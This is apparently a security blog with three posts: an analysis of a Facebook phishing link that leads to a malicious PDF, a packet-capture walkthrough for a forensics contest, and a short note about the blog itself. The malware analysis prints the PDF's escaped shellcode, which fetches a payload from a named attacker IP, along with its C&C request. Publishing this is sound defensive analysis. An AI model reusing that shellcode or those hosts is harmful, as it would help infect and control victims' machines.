Received an email in my spam box this morning with a link:

http://www.facebook.com.ferdasxe.be/usersdirectory/LoginFacebook.php?ref=[32 Char Number]&email=[My Email]

The domain resolves to a number of IPs:

www.facebook.com.ferdasxe.be. 1783 IN A 190.120.139.2
www.facebook.com.ferdasxe.be. 1783 IN A 190.247.140.107
www.facebook.com.ferdasxe.be. 1783 IN A 201.17.33.210
www.facebook.com.ferdasxe.be. 1783 IN A 201.165.72.35
www.facebook.com.ferdasxe.be. 1783 IN A 201.226.241.26
www.facebook.com.ferdasxe.be. 1783 IN A 210.112.142.61
www.facebook.com.ferdasxe.be. 1783 IN A 213.248.149.69
www.facebook.com.ferdasxe.be. 1783 IN A 60.50.84.69
www.facebook.com.ferdasxe.be. 1783 IN A 115.252.47.55
www.facebook.com.ferdasxe.be. 1783 IN A 117.242.112.254
www.facebook.com.ferdasxe.be. 1783 IN A 186.32.89.215
www.facebook.com.ferdasxe.be. 1783 IN A 189.105.95.34
www.facebook.com.ferdasxe.be. 1783 IN A 189.179.6.137
www.facebook.com.ferdasxe.be. 1783 IN A 190.7.132.216
www.facebook.com.ferdasxe.be. 1783 IN A 190.37.112.49

An iframe on this page grabs /sv/in.php from 193.104.27.234

Javascript within in.php grabs /sv/xd/pdf.pdf from 193.104.27.234

80758e30f8beb7fa79f6346b85f6cf31 pdf.pdf

Which contains more javascript:


(Snipped)
{
var vvpethya =unescape("

%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%u33AB%uB8C0%u6461%u0000%u6850%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455%uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856%uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u3931%u2E33%u3031%u2E34%u3732%u322E%u3433%u732F%u2F76%u6F6C%u6461%u702E%u7068");
(Snipped)

This grabs load.php from the /sv/ directory on host 193.104.27.234. This IP is hosted in Russia.

C&C Traffic:

POST /beslip/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 193.104.41.68
....
snip
....
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 26 Nov 2009 18:36:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6

Network Forensics Contest - Part II Answers

Woohoo....I got them all right. I kind of figured I would though - if not, I should find a new job.

I'm talking about ForensicsContest.com - a site to help educate the masses and keep security teams sharp

If you haven't done packet capture analysis in a while, I suggest you visit the site and start from the beginning.

Linux Walkthru:

1. What is Ann’s email address?
2. What is Ann’s email password?
3. What is Ann’s secret lover’s email address?
4. What two items did Ann tell her secret lover to bring?
5. What is the NAME of the attachment Ann sent to her secret lover?
6. What is the MD5sum of the attachment Ann sent to her secret lover?
7. In what CITY and COUNTRY is their rendez-vous point?
8. What is the MD5sum of the image embedded in the document?

First things first, verify the MD5SUM of the evidence file:

$ md5sum evidence02.pcap
cfac149a49175ac8e89d5b5b5d69bad3 evidence02.pcap

Next, viewing the packet capture with TCPDump, grab the email auth:

tcpdump -Alnqvvvs0 -r evidence02.pcap port 587 |less

.....

250-AUTH=LOGIN PLAIN XAOL-UAS-MB
250-AUTH LOGIN PLAIN XAOL-UAS-MB
250-STARTTLS
250-CHUNKING
250-BINARYMIME
250-X-AOL-FWD-BY-REF
250-X-AOL-DIV_TAG
250-X-AOL-OUTBOX-COPY
250 HELP

06:35:31.222415 IP (tos 0x0, ttl 128, id 126, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.159.1036 > 64.12.102.142.587: tcp 12
E..4.~@....d....@.f....K....&6.3P.......AUTH LOGIN

06:35:31.222996 IP (tos 0x0, ttl 127, id 7762, offset 0, flags [none], proto TCP (6), length 40) 64.12.102.142.587 > 192.168.1.159.1036: tcp 0
E..(.R......@.f......K..&6.3....P...x...
06:35:31.332979 IP (tos 0x0, ttl 127, id 7763, offset 0, flags [none], proto TCP (6), length 58) 64.12.102.142.587 > 192.168.1.159.1036: tcp 18
E..:.S......@.f......K..&6.3....P....J..334 VXNlcm5hbWU6

06:35:31.333745 IP (tos 0x0, ttl 128, id 127, offset 0, flags [DF], proto TCP (6), length 66) 192.168.1.159.1036 > 64.12.102.142.587: tcp 26
E..B..@....U....@.f....K....&6.EP...O...c25lYWt5ZzMza0Bhb2wuY29t

06:35:31.334435 IP (tos 0x0, ttl 127, id 7764, offset 0, flags [none], proto TCP (6), length 40) 64.12.102.142.587 > 192.168.1.159.1036: tcp 0
E..(.T......@.f......K..&6.E....P...x...
06:35:31.444079 IP (tos 0x0, ttl 127, id 7765, offset 0, flags [none], proto TCP (6), length 58) 64.12.102.142.587 > 192.168.1.159.1036: tcp 18
E..:.U......@.f......K..&6.E....P....6..334 UGFzc3dvcmQ6

06:35:31.444690 IP (tos 0x0, ttl 128, id 128, offset 0, flags [DF], proto TCP (6), length 54) 192.168.1.159.1036 > 64.12.102.142.587: tcp 14
E..6..@....`....@.f....K....&6.WP...S
..NTU4cjAwbHo=

Pay special attention to the 334 status code:

334 VXNlcm5hbWU6 => Username:

334 UGFzc3dvcmQ6 => Password:

Immediately following each 334 status code is another base64 encoded string:

c25lYWt5ZzMza0Bhb2wuY29t => sneakyg33k@aol.com

NTU4cjAwbHo= => 558r00lz

As you can see, you have the first two answers - this isn't going to be too hard. (Yes, I know about tools like ettercap, mailsnarf and dsniff that will extract this data off the wire - lets pretend we don't know about them)

Looking at the packet capture you'll see an email to sec558@gmail.com, but read carefully, the question is: What is Ann’s secret lover’s email address? The email to sec558 doesn't appear to be loving:

Sorry-- I can't do lunch next week after all. Heading out of town. Another time! -Ann.

A little further into the packet we see another email, this time to mistersecretx@aol.com:

Hi sweetheart! Bring your fake passport and a bathing suit. Address attached. love, Ann.

With an attachment:

Content-Transfer-Encoding: base64.
Content-Disposition: attachment;.
filename="secretrendezvous.docx"

Using wireshark, Follow the TCPStream for this packet and extract the base64 encoded attachment.

I used openssl to decode the base64 content like so:

$ openssl base64 -d -in email-attachment.b64 -out secretrendezvous.docx.

DOCX formatted files are also pkzip files, as shown by the "file" command:

$ md5sum secretrendezvous.docx; file secretrendezvous.docx
9e423e11db88f01bbff81172839e1923 secretrendezvous.docx
secretrendezvous.docx: Zip archive data, at least v2.0 to extract

by unzipping the file, you are able to extract image1.png

$ md5sum image1.png; file image1.png
aadeace50997b1ba24b09ac2ef1940b7 image1.png
image1.png: PNG image, 756 x 439, 8-bit/color RGB, non-interlaced

Which givs you the last two answers....

Total time from download to completetion, including screen shotting all of my work, took less than 15 minutes.

I would have had enough time to meet Ann at the airport, steal her identity and enjoy my trip to Mexico! :)

Reloading the old site

Many of you know that I used to have another blog and some of you may notice that it disappeared. Its still there, if you look hard enough, but I wont be making any updates. 

I just don't have the time like I used to, and I feel a blog shouldn't be "professional" only. So here goes - the old old blog is new again, and if you like what I have to write, your welcome to follow. Don't expect me to stay on topic - and don't expect updates too frequently. I'll put up some twitter feed to the right hand side of the page for those who choose to follow me there.